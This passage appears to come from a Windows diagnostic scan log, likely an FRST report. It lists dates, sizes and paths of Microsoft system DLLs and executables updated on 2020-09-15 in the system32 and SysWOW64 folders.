2020-09-15 17:44 - 2020-09-15 17:44 - 000604472 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000591360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AssignedAccessManager.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000575800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\IESettingSync.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000538120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000530440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000526848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000517120 _____ (Microsoft Corporation) C:\WINDOWS\system32\glmf32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000511488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000482304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000457728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxdiagn.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000446264 _____ (Microsoft Corporation) C:\WINDOWS\system32\TransportDSA.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpshell.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CscUnpinTool.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glmf32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000377344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000371712 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000367416 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000366392 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000360024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnrpsvc.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000328192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnphost.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAFMCP.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000318464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpinit.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ConfigWrapper.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000251192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVFileSystemMetadata.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000245248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glu32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000223544 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVStreamMap.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000219960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVShNotify.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\P2P.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000195384 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVStreamingUX.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000183296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgocl32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000176128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000175928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVDllSurrogate.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000167224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVNice.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000164352 _____ (Microsoft Corporation) C:\WINDOWS\system32\glu32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000164152 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvsievaluator.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000162616 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvsigpext.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgu1132.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000137016 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appvetwclientres.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdWSD.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000101688 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvgumd32.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdSSDP.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000062976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\udhisapi.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000038712 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncAppvPublishingServer.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnpcont.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000021816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScriptRunner.exe
2020-09-15 17:44 - 2020-09-15 17:44 - 000013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\appvetwstreamingux.dll
2020-09-15 17:44 - 2020-09-15 17:44 - 000012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSErrRedir.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 026272768 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 023441408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 014754304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 008897200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 007755776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 007633360 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 007611904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 006357032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 005993968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 005430480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 005056000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004892672 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004747776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004629328 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 004523008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 004009064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 003978240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AI.MachineLearning.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 003913728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 003819528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002806152 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002757120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-09-15 17:43 - 2020-09-15 17:43 - 002635640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002606592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002541056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002433024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002317824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002306048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002265328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 002206208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001951232 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001868672 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001834496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001751432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001720832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001711104 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001695208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001693208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001681408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001659904 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001654824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001640888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001617088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001557816 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001485824 _____ (Microsoft Corporation) C:\WINDOWS\system32\APMon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001449792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001449472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001388544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001375232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdprt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001333248 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001309504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-09-15 17:43 - 2020-09-15 17:43 - 001296384 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001279288 _____ (Microsoft Corporation) C:\WINDOWS\system32\drvstore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001255744 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 001181200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001128544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 001091584 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001081856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001068112 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001056768 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 001003320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\drvstore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000969216 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000943408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000920896 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000912896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000907440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000894768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000890944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000887304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000882176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000881152 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000869376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directml.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000857344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000856064 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000801544 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000797448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\propsys.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000794624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000782968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000775776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000763840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000761280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000757192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000755576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000750976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FlightSettings.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000748360 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingWinRT.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000733184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000711680 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000707584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000703488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000702792 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000702464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000697344 _____ (Microsoft Corporation) C:\WINDOWS\system32\vpnike.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000688960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000676680 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000651776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000643584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000636928 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000634680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicensingWinRT.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\system32\uxtheme.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000627712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000617472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000614912 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000611952 _____ C:\WINDOWS\SysWOW64\TextShaping.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000602184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryPS.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000588288 _____ (Microsoft Corporation) C:\WINDOWS\system32\WLanConn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000585696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000583608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StateRepository.Core.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000581632 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000572928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SppExtComObj.Exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000568120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000556544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxdiagn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\slui.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000546464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000528352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResourceMapper.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000525312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000520192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UiaManager.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000512512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragsvc.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000501248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000500968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000495848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp_win.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000491008 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnphost.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000454144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uxtheme.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WLanConn.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000434176 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2020-09-15 17:43 - 2020-09-15 17:43 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000420920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000412688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave_secure.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2020-09-15 17:43 - 2020-09-15 17:43 - 000402944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
